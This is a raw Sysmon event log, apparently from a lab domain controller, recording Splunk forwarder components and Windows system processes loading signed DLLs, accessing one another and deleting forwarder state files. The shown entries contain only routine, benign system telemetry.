EventID=7 ; EventRecordID=100614 ; UtcTime=2022-05-30 13:06:47.401 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\ws2_32.dll ; FileVersion=10.0.14393.3241 (rs1_release_inmarket.190910-1801) ; Description=Windows Socket 2.0 32-Bit DLL ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=ws2_32.dll ; Hashes=MD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8 ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=10 ; EventRecordID=100613 ; UtcTime=2022-05-30 13:06:47.400 ; SourceProcessGUID={326FD73D-A44C-6294-0901-000000005502} ; SourceProcessId=5372 ; SourceThreadId=5392 ; SourceImage=C:\Windows\system32\conhost.exe ; TargetProcessGUID={326FD73D-C167-6294-490B-000000005502} ; TargetProcessId=5920 ; TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; GrantedAccess=0x1fffff ; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
EventID=7 ; EventRecordID=100612 ; UtcTime=2022-05-30 13:06:47.400 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\KernelBase.dll ; FileVersion=10.0.14393.5125 (rs1_release.220429-1732) ; Description=Windows NT BASE API Client DLL ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=Kernelbase.dll ; Hashes=MD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9 ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100611 ; UtcTime=2022-05-30 13:06:47.399 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\kernel32.dll ; FileVersion=10.0.14393.5066 (rs1_release.220401-1841) ; Description=Windows NT BASE API Client DLL ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=kernel32 ; Hashes=MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682 ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100610 ; UtcTime=2022-05-30 13:06:47.399 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Windows\System32\ntdll.dll ; FileVersion=10.0.14393.5006 (rs1_release.220301-1704) ; Description=NT Layer DLL ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=ntdll.dll ; Hashes=MD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000 ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100609 ; UtcTime=2022-05-30 13:06:47.399 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; ImageLoaded=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; FileVersion=8.2.5 ; Description=Network monitor ; Product=Splunk Application ; Company=Splunk Inc. ; OriginalFileName=splunk-netmon.exe ; Hashes=MD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52 ; Signed=true ; Signature=Splunk, Inc. ; SignatureStatus=Valid
EventID=10 ; EventRecordID=100608 ; UtcTime=2022-05-30 13:06:47.398 ; SourceProcessGUID={326FD73D-A252-6294-0500-000000005502} ; SourceProcessId=416 ; SourceThreadId=532 ; SourceImage=C:\Windows\system32\csrss.exe ; TargetProcessGUID={326FD73D-C167-6294-490B-000000005502} ; TargetProcessId=5920 ; TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; GrantedAccess=0x1fffff ; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f
EventID=10 ; EventRecordID=100607 ; UtcTime=2022-05-30 13:06:47.398 ; SourceProcessGUID={326FD73D-A254-6294-0C00-000000005502} ; SourceProcessId=848 ; SourceThreadId=2056 ; SourceImage=C:\Windows\system32\svchost.exe ; TargetProcessGUID={326FD73D-A262-6294-2700-000000005502} ; TargetProcessId=2872 ; TargetImage=C:\Windows\sysmon64.exe ; GrantedAccess=0x1400 ; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
EventID=10 ; EventRecordID=100606 ; UtcTime=2022-05-30 13:06:47.398 ; SourceProcessGUID={326FD73D-A254-6294-0C00-000000005502} ; SourceProcessId=848 ; SourceThreadId=2056 ; SourceImage=C:\Windows\system32\svchost.exe ; TargetProcessGUID={326FD73D-A262-6294-2700-000000005502} ; TargetProcessId=2872 ; TargetImage=C:\Windows\sysmon64.exe ; GrantedAccess=0x1400 ; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
EventID=10 ; EventRecordID=100605 ; UtcTime=2022-05-30 13:06:47.396 ; SourceProcessGUID={326FD73D-A44C-6294-0501-000000005502} ; SourceProcessId=5164 ; SourceThreadId=6008 ; SourceImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe ; TargetProcessGUID={326FD73D-C167-6294-490B-000000005502} ; TargetProcessId=5920 ; TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; GrantedAccess=0x1fffff ; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
EventID=10 ; EventRecordID=100604 ; UtcTime=2022-05-30 13:06:47.396 ; SourceProcessGUID={326FD73D-A254-6294-0C00-000000005502} ; SourceProcessId=848 ; SourceThreadId=2056 ; SourceImage=C:\Windows\system32\svchost.exe ; TargetProcessGUID={326FD73D-A262-6294-2700-000000005502} ; TargetProcessId=2872 ; TargetImage=C:\Windows\sysmon64.exe ; GrantedAccess=0x1400 ; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
EventID=10 ; EventRecordID=100603 ; UtcTime=2022-05-30 13:06:47.396 ; SourceProcessGUID={326FD73D-A254-6294-0C00-000000005502} ; SourceProcessId=848 ; SourceThreadId=2056 ; SourceImage=C:\Windows\system32\svchost.exe ; TargetProcessGUID={326FD73D-A262-6294-2700-000000005502} ; TargetProcessId=2872 ; TargetImage=C:\Windows\sysmon64.exe ; GrantedAccess=0x1400 ; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
EventID=1 ; EventRecordID=100602 ; UtcTime=2022-05-30 13:06:47.392 ; ProcessGuid={326FD73D-C167-6294-490B-000000005502} ; ProcessId=5920 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe ; FileVersion=8.2.5 ; Description=Network monitor ; Product=Splunk Application ; Company=Splunk Inc. ; OriginalFileName=splunk-netmon.exe ; CommandLine="C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe" ; CurrentDirectory=C:\Windows\system32\ ; User=NT AUTHORITY\SYSTEM ; LogonGuid={326FD73D-A253-6294-E703-000000000000} ; LogonId=0x3e7 ; TerminalSessionId=0 ; IntegrityLevel=System ; Hashes=MD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52 ; ParentProcessGuid={326FD73D-A44C-6294-0501-000000005502} ; ParentProcessId=5164 ; ParentImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe ; ParentCommandLine="C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
EventID=23 ; EventRecordID=100601 ; UtcTime=2022-05-30 13:06:47.390 ; ProcessGuid={326FD73D-A262-6294-2400-000000005502} ; ProcessId=2732 ; User=NT AUTHORITY\SYSTEM ; Image=C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe ; TargetFilename=C:\ProgramData\Amazon\SSM\InstanceData\i-099f25d280474ac19\channels\health\surveyor-20220530105426-129 ; Hashes=MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
EventID=23 ; EventRecordID=100600 ; UtcTime=2022-05-30 13:06:47.234 ; ProcessGuid={326FD73D-A45C-6294-5601-000000005502} ; ProcessId=6368 ; User=NT AUTHORITY\SYSTEM ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; Hashes=MD5=841A43D2D85DC37FE18D59E007522544,SHA256=44A291BFAE776325B670DDE14DFFA522FDD28CFD9832F6CCAAD7A2C7FB79398A,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
EventID=10 ; EventRecordID=100599 ; UtcTime=2022-05-30 13:06:47.046 ; SourceProcessGUID={326FD73D-C166-6294-480B-000000005502} ; SourceProcessId=6760 ; SourceThreadId=3768 ; SourceImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe ; TargetProcessGUID={326FD73D-A44C-6294-0501-000000005502} ; TargetProcessId=5164 ; TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe ; GrantedAccess=0x101400 ; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
EventID=7 ; EventRecordID=100598 ; UtcTime=2022-05-30 13:06:47.046 ; ProcessGuid={326FD73D-C166-6294-480B-000000005502} ; ProcessId=6760 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe ; ImageLoaded=C:\Windows\System32\dbgcore.dll ; FileVersion=10.0.14321.1024 (debuggers(dbg).210127-1811) ; Description=Windows Core Debugging Helpers ; Product=Microsoft® Windows® Operating System ; Company=Microsoft ; OriginalFileName=DBGCORE.DLL ; Hashes=MD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2E ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100597 ; UtcTime=2022-05-30 13:06:47.046 ; ProcessGuid={326FD73D-C166-6294-480B-000000005502} ; ProcessId=6760 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe ; ImageLoaded=C:\Windows\System32\dbghelp.dll ; FileVersion=10.0.14321.1024 (rs1_release.160715-1616) ; Description=Windows Image Helper ; Product=Microsoft® Windows® Operating System ; Company=Microsoft ; OriginalFileName=DBGHELP.DLL ; Hashes=MD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBE ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=23 ; EventRecordID=100659 ; UtcTime=2022-05-30 13:06:48.484 ; ProcessGuid={326FD73D-A44C-6294-0501-000000005502} ; ProcessId=5164 ; User=NT AUTHORITY\SYSTEM ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe ; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.log ; Hashes=MD5=ED46D36EEC474496F4EE890B6E6A3FBB,SHA256=CD3EFD1F17B5E5E1FD98E11D39AFA116D9111F6098453A857EBB4F32B7208E8B,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
EventID=23 ; EventRecordID=100658 ; UtcTime=2022-05-30 13:06:48.015 ; ProcessGuid={326FD73D-A45C-6294-5601-000000005502} ; ProcessId=6368 ; User=NT AUTHORITY\SYSTEM ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; Hashes=MD5=C1C21267257F746248C71F50D968A7FF,SHA256=AE2897ED5F0FBB2DF1C8823D26EEE3A601BA396EF8A42742555B0321803F429C,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
EventID=7 ; EventRecordID=100763 ; UtcTime=2022-05-30 13:06:49.906 ; ProcessGuid={326FD73D-C169-6294-4B0B-000000005502} ; ProcessId=4460 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe ; ImageLoaded=C:\Windows\System32\kernel.appcore.dll ; FileVersion=10.0.14393.2312 (rs1_release.180607-1919) ; Description=AppModel API Host ; Product=Microsoft® Windows® Operating System ; Company=Microsoft Corporation ; OriginalFileName=kernel.appcore.dll ; Hashes=MD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667D ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=10 ; EventRecordID=100762 ; UtcTime=2022-05-30 13:06:49.906 ; SourceProcessGUID={326FD73D-C169-6294-4B0B-000000005502} ; SourceProcessId=4460 ; SourceThreadId=6804 ; SourceImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe ; TargetProcessGUID={326FD73D-A44C-6294-0501-000000005502} ; TargetProcessId=5164 ; TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe ; GrantedAccess=0x101400 ; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
EventID=7 ; EventRecordID=100761 ; UtcTime=2022-05-30 13:06:49.906 ; ProcessGuid={326FD73D-C169-6294-4B0B-000000005502} ; ProcessId=4460 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe ; ImageLoaded=C:\Windows\System32\dbgcore.dll ; FileVersion=10.0.14321.1024 (debuggers(dbg).210127-1811) ; Description=Windows Core Debugging Helpers ; Product=Microsoft® Windows® Operating System ; Company=Microsoft ; OriginalFileName=DBGCORE.DLL ; Hashes=MD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2E ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=7 ; EventRecordID=100760 ; UtcTime=2022-05-30 13:06:49.906 ; ProcessGuid={326FD73D-C169-6294-4B0B-000000005502} ; ProcessId=4460 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe ; ImageLoaded=C:\Windows\System32\dbghelp.dll ; FileVersion=10.0.14321.1024 (rs1_release.160715-1616) ; Description=Windows Image Helper ; Product=Microsoft® Windows® Operating System ; Company=Microsoft ; OriginalFileName=DBGHELP.DLL ; Hashes=MD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBE ; Signed=true ; Signature=Microsoft Windows ; SignatureStatus=Valid
EventID=23 ; EventRecordID=100759 ; UtcTime=2022-05-30 13:06:49.874 ; ProcessGuid={326FD73D-A45C-6294-5601-000000005502} ; ProcessId=6368 ; User=NT AUTHORITY\SYSTEM ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; Hashes=MD5=9BB1B7E58CAEBBBE86065B769AE7BB4C,SHA256=28A956370F1C59647B3E87E71C2840B613D0D5E90C2103060F4D98BB6C7089C8,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
734700x8000000000000000100758Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.718{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x8000000000000000100757Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.718{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x8000000000000000100756Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.718{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x8000000000000000100755Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.718{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x8000000000000000100754Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.718{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x8000000000000000100753Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.718{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x8000000000000000100752Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.718{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x8000000000000000100751Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.718{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x8000000000000000100750Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x8000000000000000100749Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 
